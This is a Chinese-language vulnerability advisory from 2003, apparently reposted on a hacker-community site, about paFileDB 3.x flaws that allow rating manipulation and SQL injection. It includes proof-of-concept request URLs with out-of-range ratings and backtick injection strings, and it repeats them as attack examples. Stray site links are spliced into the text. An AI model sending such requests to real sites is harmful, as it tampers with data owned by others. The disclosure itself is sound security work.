paFileDB 3.x SQL 存在注入缺陷

发布日期：2003-03-25
  
涉及
[url=/code/]程序[/url]
：  paFileDB 3.0 Final/3.0 Beta 3.1/3.1 Final   

详细描述：   paFileDB是一种文件管理
[url=/code/]脚本[/url]
，支持用户文件等级分类，并使用SQL
[url=/code/sql/]数据库[/url]
backend。由于对输入的变量缺乏正确的检查，paFileDB存在多个缺陷：
—修改的“id”标签允许用户提交无限的等级分类
—手动编辑“rating”标签允许用户提交大于10或小于0的等级分类
—标签没有正确检查溢出字符，导致
[url=/]攻击[/url]
者能进行SQL注入  使用任意简短字符串和
[url=/code/]脚本[/url]
替换[RANDOM]：
http://target/pafiledb/pafiledb.
[url=/code/php/]php[/url]
?action=rate%26amp;id=1[RANDOM]%26amp;rate=dorate%26amp;rating=10  提交文件等级分类（从10到1000，如果为-1000，将出现相反等级分类）：
http://target/pafiledb/pafiledb.
[url=/code/php/]php[/url]
?action=rate%26amp;id=1%26amp;rate=dorate%26amp;rating=1000  SQL注入
[url=/]攻击[/url]
：
http://target/pafiledb/pafiledb.
[url=/code/php/]php[/url]
?action=rate%26amp;id=1%26amp;rate=dorate%26amp;rating=`
http://target/pafiledb/pafiledb.
[url=/code/php/]php[/url]
?action=rate%26amp;id=`%26amp;rate=dorate%26amp;rating=10
  

[url=/]攻击[/url]
方法：   示例代码1：
http://target/pafiledb/pafiledb.
[url=/code/php/]php[/url]
?action=rate%26amp;id=1[RANDOM]%26amp;rate=dorate%26amp;rating=10  示例代码2：
http://target/pafiledb/pafiledb.
[url=/code/php/]php[/url]
?action=rate%26amp;id=1%26amp;rate=dorate%26amp;rating=1000  示例代码3：
http://target/pafiledb/pafiledb.
[url=/code/php/]php[/url]
?action=rate%26amp;id=1%26amp;rate=dorate%26amp;rating=`
http://target/pafiledb/pafiledb.
[url=/code/php/]php[/url]
?action=rate%26amp;id=`%26amp;rate=dorate%26amp;rating=10
  
解决方案：  目前厂商未公布该缺陷补丁，请用户及时关注厂商站点：

[url=/code/php/]php[/url]
arena.net/">http://www.
[url=/code/php/]php[/url]
arena.net/                                  



[url=java:copyUrl(]复制地址，推荐给QQ、MSN上的好友[/url]


[url=/bbs/]进入黑客手册技术论坛和大家一起讨论[/url]